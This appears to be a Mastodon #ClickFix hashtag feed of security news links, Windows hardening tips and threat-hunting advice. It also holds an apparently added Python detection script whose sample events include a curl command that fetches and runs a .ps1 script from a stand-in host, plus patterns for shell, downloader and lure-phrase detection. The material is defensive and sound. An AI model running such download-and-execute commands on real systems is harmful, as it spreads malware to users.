#clickfix

Threat Insight<p>State-sponsored threat actors often leverage techniques first developed and deployed by cybercriminal actors. One example is <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a>, a highly effective technique that involves clever <a href="https://infosec.exchange/tags/socialengineering" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>socialengineering</span></a>.</p><p>Listen as Proofpoint threat research experts Selena Larson, Sarah Sabotka, and Saher Naumaan deep dive into how modern <a href="https://infosec.exchange/tags/espionage" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>espionage</span></a> and <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybercrime</span></a> are increasingly blurring lines.</p><p>Stream DISCARDED now:<br>Apple Podcasts: <a href="https://brnw.ch/21wSNbM" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="">brnw.ch/21wSNbM</span><span class="invisible"></span></a><br>Spotify: <a href="https://brnw.ch/21wSNbL" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="">brnw.ch/21wSNbL</span><span class="invisible"></span></a><br>Web player: <a href="https://brnw.ch/21wSNbN" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="">brnw.ch/21wSNbN</span><span class="invisible"></span></a></p>
Taggart :donor:<p>Reposting this since the first go-round coincided with some hosting trubz.</p><p>Here's a quick review of some of the easy wins against <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a>!</p><p><a href="https://taggart-tech.com/clickfix/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="">taggart-tech.com/clickfix/</span><span class="invisible"></span></a></p>
2rZiKKbOU3nTafniR2qMMSE0gwZRansomware group uses ClickFix to attack businesses The Interlock ransomware group is using the C...<br><br><a href="https://www.kaspersky.co.uk/blog/interlock-ransomware-clickfix-attack/28962/" rel="nofollow noopener noreferrer" target="_blank">https://www.kaspersky.co.uk/blog/interlock-ransomware-clickfix-attack/28962/</a><br><br><a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/Business" target="_blank">#Business</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/Enterprise" target="_blank">#Enterprise</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/SMB" target="_blank">#SMB</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/attacks" target="_blank">#attacks</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/browsers" target="_blank">#browsers</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/Captcha" target="_blank">#Captcha</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/ClickFix" target="_blank">#ClickFix</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/cryptomalware" target="_blank">#cryptomalware</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/keyloggers" target="_blank">#keyloggers</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/PowerShell" target="_blank">#PowerShell</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/ransomware" target="_blank">#ransomware</a><br><br><a 
href="https://awakari.com/pub-msg.html?id=GVzLMElRaPkGGclMuXH7ydyQXvU&amp;interestId=2rZiKKbOU3nTafniR2qMMSE0gwZ" rel="nofollow noopener noreferrer" target="_blank">Result Details</a>
Pyrzout :vm:<p>iClicker Website Hacked with Fake CAPTCHA in ClickFix Attack – Source:hackread.com <a href="https://ciso2ciso.com/iclicker-website-hacked-with-fake-captcha-in-clickfix-attack-sourcehackread-com/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/iclicker-website</span><span class="invisible">-hacked-with-fake-captcha-in-clickfix-attack-sourcehackread-com/</span></a> <a href="https://social.skynetcloud.site/tags/1CyberSecurityNewsPost" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>1CyberSecurityNewsPost</span></a> <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://social.skynetcloud.site/tags/CyberAttacks" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberAttacks</span></a> <a href="https://social.skynetcloud.site/tags/CyberAttack" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberAttack</span></a> <a href="https://social.skynetcloud.site/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://social.skynetcloud.site/tags/Hackread" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Hackread</span></a> <a href="https://social.skynetcloud.site/tags/iClicker" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iClicker</span></a> <a href="https://social.skynetcloud.site/tags/security" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>security</span></a> <a 
href="https://social.skynetcloud.site/tags/Captcha" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Captcha</span></a> <a href="https://social.skynetcloud.site/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a></p>
Pyrzout :vm:<p>iClicker Website Hacked with Fake CAPTCHA in ClickFix Attack <a href="https://hackread.com/iclicker-website-hacked-fake-captcha-clickfix-attack/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">hackread.com/iclicker-website-</span><span class="invisible">hacked-fake-captcha-clickfix-attack/</span></a> <a href="https://social.skynetcloud.site/tags/Cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Cybersecurity</span></a> <a href="https://social.skynetcloud.site/tags/CyberAttacks" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberAttacks</span></a> <a href="https://social.skynetcloud.site/tags/CyberAttack" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberAttack</span></a> <a href="https://social.skynetcloud.site/tags/Security" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Security</span></a> <a href="https://social.skynetcloud.site/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://social.skynetcloud.site/tags/iClicker" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iClicker</span></a> <a href="https://social.skynetcloud.site/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://social.skynetcloud.site/tags/Captcha" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Captcha</span></a></p>
Taggart :donor:<p>I think I have a nice compromise <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> ...fix for those places that just can't live without some Explorer niceties. </p><p>There is an alternative to the "Disable Windows shortcuts" GPO, which not only disables Win+ shortcuts, but also things like using UNC paths in the Explorer address bar. </p><p>Of course, Geoff Chappell <a href="https://www.geoffchappell.com/notes/windows/shell/explorer/globalhotkeys.htm" rel="nofollow noopener noreferrer" target="_blank">lights the way</a>.</p><p>I believe that GPO applies the <code>REST_NORUN</code> reg key and not <code>REST_NOWINKEYS</code> policies—despite the name.</p><p>If I apply the <code>REST_NORUN</code> reg setting directly, I get the same behavior as the GPO. The popup pictured here appears.</p><p>But if I instead set the <code>REST_NOWINKEYS</code> dialog, the Win+R shortcut is disabled, but other stuff (like UNC paths in explorer) still works! Now, this doesn't remove the Run command from the start menu, but it is at least a safety. Oh and one more thing: because that shortcut is now unregistered, you can register it yourself for something like a lil daemon that pops a message box saying <code>Hey did a website tell you to do this? Don't!</code></p><p>You can try both settings.</p><p><code>REST_NORUN</code>: <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun</code></p><p><code>REST_NOWINKEYS</code>: <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys</code></p><p><strong>UPDATE</strong>: You can additionally disable <em>only</em> Win+R by setting <code>HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\Advanced\DisabledHotkeys</code> to a String value containing the Win shortcuts you want to disable. So a single <code>R</code> will do the trick. 
Note this only works at the user level.</p>
The New Oil<p>Hackers now testing <a href="https://mastodon.thenewoil.org/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> attacks against <a href="https://mastodon.thenewoil.org/tags/Linux" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Linux</span></a> targets</p><p><a href="https://www.bleepingcomputer.com/news/security/hackers-now-testing-clickfix-attacks-against-linux-targets/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">bleepingcomputer.com/news/secu</span><span class="invisible">rity/hackers-now-testing-clickfix-attacks-against-linux-targets/</span></a></p><p><a href="https://mastodon.thenewoil.org/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://mastodon.thenewoil.org/tags/FOSS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>FOSS</span></a></p>
Hackread.com<p>🚨 Popular student engagement platform iClicker’s website was hacked with a fake "I'm not a robot" check which is a textbook example of a ClickFix attack.</p><p>Read: <a href="https://hackread.com/iclicker-website-hacked-fake-captcha-clickfix-attack/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">hackread.com/iclicker-website-</span><span class="invisible">hacked-fake-captcha-clickfix-attack/</span></a></p><p><a href="https://mstdn.social/tags/iClicker" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iClicker</span></a> <a href="https://mstdn.social/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberSecurity</span></a> <a href="https://mstdn.social/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://mstdn.social/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a></p>
nemo™ 🇺🇦<p>🚨 New ClickFix campaign alert! 🚨 This evolving cyberattack now targets both Windows &amp; Linux users by tricking them into running malicious console commands under the guise of “browser updates” or CAPTCHA tests. 🖥️🔒 Currently harmless but watch out! Threat actor: APT36 (Pakistan). Stay safe &amp; informed! 🔐 <a href="https://mas.to/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberSecurity</span></a> <a href="https://mas.to/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://mas.to/tags/Linux" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Linux</span></a> <a href="https://mas.to/tags/Windows" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Windows</span></a> <a href="https://mas.to/tags/APT36" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>APT36</span></a> <a href="https://mas.to/tags/InfoSec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>InfoSec</span></a> <a href="https://mas.to/tags/TechRadar" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>TechRadar</span></a> <a href="https://mas.to/tags/newz" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>newz</span></a> </p><p>Read more: <a href="https://www.techradar.com/pro/security/new-clickfix-campaign-spotted-hitting-both-windows-and-linux-machines" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">techradar.com/pro/security/new</span><span class="invisible">-clickfix-campaign-spotted-hitting-both-windows-and-linux-machines</span></a></p>
LavX News<p>New ClickFix Attacks Target Linux: A Shift in Cyber Threat Landscape</p><p>In a surprising twist, hackers are now adapting ClickFix attacks to target Linux systems, previously dominated by Windows vulnerabilities. This development highlights the evolving tactics of cybercrim...</p><p><a href="https://news.lavx.hu/article/new-clickfix-attacks-target-linux-a-shift-in-cyber-threat-landscape" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">news.lavx.hu/article/new-click</span><span class="invisible">fix-attacks-target-linux-a-shift-in-cyber-threat-landscape</span></a></p><p><a href="https://ioc.exchange/tags/news" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>news</span></a> <a href="https://ioc.exchange/tags/tech" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>tech</span></a> <a href="https://ioc.exchange/tags/LinuxSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>LinuxSecurity</span></a> <a href="https://ioc.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://ioc.exchange/tags/APT36" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>APT36</span></a></p>
CEOTECH.IT<p>Google discovers LostKeys: Russian malware for espionage<br><a href="https://mastodon.social/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://mastodon.social/tags/COLDRIVER" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>COLDRIVER</span></a> <a href="https://mastodon.social/tags/CyberEspionage" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberEspionage</span></a> <a href="https://mastodon.social/tags/Cybercrime" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Cybercrime</span></a> <a href="https://mastodon.social/tags/FSB" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>FSB</span></a> <a href="https://mastodon.social/tags/Geopolitica" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Geopolitica</span></a> <a href="https://mastodon.social/tags/Google" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Google</span></a> <a href="https://mastodon.social/tags/LostKeys" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>LostKeys</span></a> <a href="https://mastodon.social/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://mastodon.social/tags/Notizie" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Notizie</span></a> <a href="https://mastodon.social/tags/Russia" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Russia</span></a> <a href="https://mastodon.social/tags/Sicurezza" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Sicurezza</span></a> <a href="https://mastodon.social/tags/Spionaggio" class="mention hashtag" rel="nofollow noopener noreferrer" 
target="_blank">#<span>Spionaggio</span></a> <a href="https://mastodon.social/tags/StateSponsoredHacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>StateSponsoredHacking</span></a> <a href="https://mastodon.social/tags/TechNews" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>TechNews</span></a> <a href="https://mastodon.social/tags/Tecnologia" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Tecnologia</span></a> <a href="https://mastodon.social/tags/ThreatIntelligence" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntelligence</span></a> <a href="https://mastodon.social/tags/VBS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>VBS</span></a> </p><p><a href="https://www.ceotech.it/google-scopre-lostkeys-malware-russo-per-lo-spionaggio/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">ceotech.it/google-scopre-lostk</span><span class="invisible">eys-malware-russo-per-lo-spionaggio/</span></a></p>
LavX News<p>iClicker Hack: A Cautionary Tale of ClickFix Malware Targeting Students</p><p>In a concerning breach, the iClicker platform was compromised by a ClickFix attack, leading to a sophisticated malware distribution scheme targeting students and educators. This incident highlights th...</p><p><a href="https://news.lavx.hu/article/iclicker-hack-a-cautionary-tale-of-clickfix-malware-targeting-students" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">news.lavx.hu/article/iclicker-</span><span class="invisible">hack-a-cautionary-tale-of-clickfix-malware-targeting-students</span></a></p><p><a href="https://ioc.exchange/tags/news" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>news</span></a> <a href="https://ioc.exchange/tags/tech" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>tech</span></a> <a href="https://ioc.exchange/tags/Cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Cybersecurity</span></a> <a href="https://ioc.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://ioc.exchange/tags/iClicker" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iClicker</span></a></p>
Bob Carver<p>Macs under threat from thousands of hacked sites spreading malware — how to stay safe<br><a href="https://www.tomsguide.com/computing/online-security/macs-under-threat-from-thousands-of-hacked-sites-spreading-malware-how-to-stay-safe" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">tomsguide.com/computing/online</span><span class="invisible">-security/macs-under-threat-from-thousands-of-hacked-sites-spreading-malware-how-to-stay-safe</span></a><br><a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/Apple" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Apple</span></a> <a href="https://infosec.exchange/tags/Macs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Macs</span></a> <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a> <a href="https://infosec.exchange/tags/socialengineering" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>socialengineering</span></a></p>
Pyrzout :vm:<p>ClickFix Scam: How to Protect Your Business Against This Evolving Threat <a href="https://hackread.com/clickfix-scam-how-to-protect-business-againt-threat/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">hackread.com/clickfix-scam-how</span><span class="invisible">-to-protect-business-againt-threat/</span></a> <a href="https://social.skynetcloud.site/tags/Cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Cybersecurity</span></a> <a href="https://social.skynetcloud.site/tags/Security" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Security</span></a> <a href="https://social.skynetcloud.site/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://social.skynetcloud.site/tags/Phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Phishing</span></a> <a href="https://social.skynetcloud.site/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://social.skynetcloud.site/tags/Captcha" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Captcha</span></a> <a href="https://social.skynetcloud.site/tags/Scam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Scam</span></a></p>
Pyrzout :vm:<p>ClickFix Scam: How to Protect Your Business Against This Evolving Threat – Source:hackread.com <a href="https://ciso2ciso.com/clickfix-scam-how-to-protect-your-business-against-this-evolving-threat-sourcehackread-com/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/clickfix-scam-ho</span><span class="invisible">w-to-protect-your-business-against-this-evolving-threat-sourcehackread-com/</span></a> <a href="https://social.skynetcloud.site/tags/1CyberSecurityNewsPost" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>1CyberSecurityNewsPost</span></a> <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://social.skynetcloud.site/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://social.skynetcloud.site/tags/Hackread" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Hackread</span></a> <a href="https://social.skynetcloud.site/tags/Phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Phishing</span></a> <a href="https://social.skynetcloud.site/tags/security" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>security</span></a> <a href="https://social.skynetcloud.site/tags/Captcha" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Captcha</span></a> <a href="https://social.skynetcloud.site/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a> <a 
href="https://social.skynetcloud.site/tags/Scam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Scam</span></a></p>
Taggart :donor:<p>FWIW, 100% of <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> attacks I've seen have added some kind of inline comment at the end of the command string like <code>I am not a robot</code> to sell the ruse. Definitely worth a threat hunt on command line history.</p><p><a href="https://infosec.exchange/tags/ThreatHunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatHunting</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/ThreatIntelligence" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntelligence</span></a></p>
Saltmyhash<p>Examine your EDR telemetry or other process command logs for the following <a href="https://infosec.exchange/tags/clickfix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>clickfix</span></a> flow:</p><p>Explorer.exe -&gt; powershell.exe -&gt; cmd.exe -&gt; curl/wget to grab a .ps1 -&gt; powershell.exe</p><p>The above flow was initiated using a Cloudflare Captcha challenge on a compromised website which fooled the victim into running the clipboard command. Also, look out for internet traffic which sources from copilot.exe. It won’t have a referrer in proxy logging which made figuring out where or how the victim initially hit the clickfix domain difficult. EDR telemetry ultimately showed copilot.exe making the initial netconn to the clickfix domain. Microsoft Purview analysis of copilot was needed to figure out what the victim entered in the prompt to drive them to the compromised site hosting the clickfix payload. </p><p>Mitigation is to recommend restricting cmd.exe or powershell.exe execution to privileged groups only. Bob in the C-suite shouldn’t be able to use run to execute cmd.exe commands copied to his clipboard. Scope usage of cmd/powershell so you don’t blow up legitimate patching or remote assistance efforts. Also, know if copilot is on in your org and restrict or create privileged groups who need it. </p><p>Almost every threat actor I track now is using the clickfix technique, apparently because it works. Users are more than happy to self-diagnose problems or solve bogus captchas by doing what prompts tell them to do. 
</p><p><a href="https://infosec.exchange/tags/soc" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>soc</span></a> <a href="https://infosec.exchange/tags/threatintelligence" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatintelligence</span></a> <a href="https://infosec.exchange/tags/dfir" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dfir</span></a> <a href="https://infosec.exchange/tags/clickfix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>clickfix</span></a></p>
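The two hunts described in the posts above (a trailing lure comment such as `I am not a robot` on the command line, and the Explorer.exe -> powershell.exe -> cmd.exe -> curl/wget `.ps1` download -> powershell.exe flow) can be run together over process-creation telemetry. This is an added example, not code from either poster; the event field names, the rule names, the extra lure phrases beyond `I am not a robot`, and every sample event are constructed assumptions.

```python
import re
from ntpath import basename  # parse Windows paths regardless of the analyst's OS

# Constructed process-creation events (pid / ppid / image / command line), shaped
# loosely like EDR or Sysmon process telemetry. All values are invented.
EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -c "cmd /c <redacted>" # I am not a robot'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd /c <redacted>"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl -o C:\Users\Public\u.ps1 https://example.invalid/u.ps1"},
    {"pid": 500, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -File C:\Users\Public\u.ps1"},
    # Benign look-alikes: an ordinary trailing comment, and a download with no .ps1.
    {"pid": 600, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\Scripts\inventory.ps1 # weekly inventory"},
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl https://example.invalid/health"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DOWNLOADERS = {"curl.exe", "wget.exe"}
# Only "i am not a robot" comes from the post; the other phrases are assumptions.
LURE_PHRASES = ("i am not a robot", "captcha", "verification")
PS1_RE = re.compile(r"\.ps1\b", re.IGNORECASE)
# Ancestors of the downloader, nearest first, as described in the flow above.
PARENT_CHAIN = ["cmd.exe", "powershell.exe", "explorer.exe"]


def image_name(event):
    """Lower-cased executable name of a process event."""
    return basename(event["image"]).lower()


def trailing_comment(cmd):
    """Text after a final whitespace-preceded '#', or None.

    Requiring whitespace before '#' avoids matching URL fragments.
    """
    match = re.search(r"\s#\s*([^#]+)$", cmd)
    return match.group(1).strip() if match else None


def has_lure_comment(cmd):
    """True when the command line ends in a comment containing a lure phrase."""
    comment = trailing_comment(cmd)
    return bool(comment) and any(p in comment.lower() for p in LURE_PHRASES)


def ancestry(pid, by_pid):
    """Image names from `pid` up to the oldest known ancestor (nearest first)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # `seen` guards against pid loops
        seen.add(pid)
        chain.append(image_name(by_pid[pid]))
        pid = by_pid[pid]["ppid"]
    return chain


def is_ordered_subsequence(needle, haystack):
    """True when the items of `needle` appear in `haystack` in the same order."""
    remaining = iter(haystack)
    return all(item in remaining for item in needle)


def hunt(events):
    """Return (pid, rule) findings for the two ClickFix heuristics."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for event in events:
        name = image_name(event)
        if name in SHELLS and has_lure_comment(event["cmd"]):
            findings.append((event["pid"], "lure-comment"))
        if name in DOWNLOADERS and PS1_RE.search(event["cmd"]):
            parents = ancestry(event["ppid"], by_pid)
            if is_ordered_subsequence(PARENT_CHAIN, parents):
                findings.append((event["pid"], "download-chain"))
                # PowerShell started by the same cmd.exe is the likely script run.
                for sibling in events:
                    if (sibling["ppid"] == event["ppid"]
                            and sibling["pid"] != event["pid"]
                            and image_name(sibling) == "powershell.exe"):
                        findings.append((sibling["pid"], "staged-script-exec"))
    return findings


if __name__ == "__main__":
    for pid, rule in hunt(EVENTS):
        print(pid, rule)
```

Real telemetry reuses PIDs, so production logic should key processes on a unique process GUID or on PID plus start time rather than PID alone.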
Brad<p>2025-04-22 (Tuesday): Always fun to find the fake CAPTCHA pages with the <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> style instructions trying to convince viewers to infect their computers with malware. </p><p>Saw <a href="https://infosec.exchange/tags/StealC" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>StealC</span></a> from an infection today. </p><p>Indicators available at <a href="https://github.com/malware-traffic/indicators/blob/main/2025-04-22-IOCs-for-ClickFix-style-campaign-leading-to-StealC-infection.txt" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">github.com/malware-traffic/ind</span><span class="invisible">icators/blob/main/2025-04-22-IOCs-for-ClickFix-style-campaign-leading-to-StealC-infection.txt</span></a></p><p><a href="https://infosec.exchange/tags/ClipboardHijacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClipboardHijacking</span></a> <a href="https://infosec.exchange/tags/Pastejacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Pastejacking</span></a></p>